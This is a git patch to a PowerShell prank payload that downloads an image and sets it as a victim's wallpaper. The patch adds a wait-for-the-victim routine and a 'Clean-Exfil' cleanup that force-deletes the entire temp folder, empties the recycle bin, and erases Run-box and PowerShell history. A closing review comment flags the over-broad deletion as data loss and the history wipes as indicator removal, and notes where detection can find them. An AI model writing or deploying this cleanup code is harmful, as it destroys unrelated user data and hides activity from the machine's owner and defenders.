From 8725311518a5128f6a0f0dbb2bedbe6f4d64abe6 Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Wed, 14 Sep 2022 00:15:55 -0500
Subject: [PATCH] Update Wallpaper-URL.ps1
---
 Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1 | 36 ++++++++++++++++++-
 1 file changed, 35 insertions(+), 1 deletion(-)
diff --git a/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1 b/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1
index a172e0e..2bd2c81 100644
--- a/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1
+++ b/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1
@@ -2,7 +2,7 @@ $url = "WALLPAPER URL HERE"
 $ext = $url.split(".")[-1]
-$wp = "$Env:USERPROFILE\Desktop\---wp.$ext"
+$wp = "$Env:tmp\---wp.$ext"
 iwr $url -O $wp
@@ -65,5 +65,39 @@ public class Params
 $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
 }
+function Target-Comes {
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+function Clean-Exfil {
+
+# empty temp folder
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# delete run box history
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Empty recycle bin
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+}
+
+
+Target-Comes
 Set-WallPaper -Image $wp -Style Fill
+Clean-Exfil
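Review bot: `Clean-Exfil` removes far more than this script created: `rm $env:TEMP\* -r -Force` and `Clear-RecycleBin -Force` delete every temp file and recycled item of the logged-on user with errors silenced, so unrelated data and the temp files of running applications are lost. The only artifact the patch writes is `$wp`, so the file cleanup should be limited to `Remove-Item -LiteralPath $wp -Force -ErrorAction SilentlyContinue` and the recycle-bin call dropped. The `RunMRU` and PSReadLine history deletions are indicator removal (ATT&CK T1070.003 for the history file) and should carry a comment saying so; on a monitored host they remain visible through PowerShell script block logging and process-creation auditing of `reg delete`, which is where detection should look.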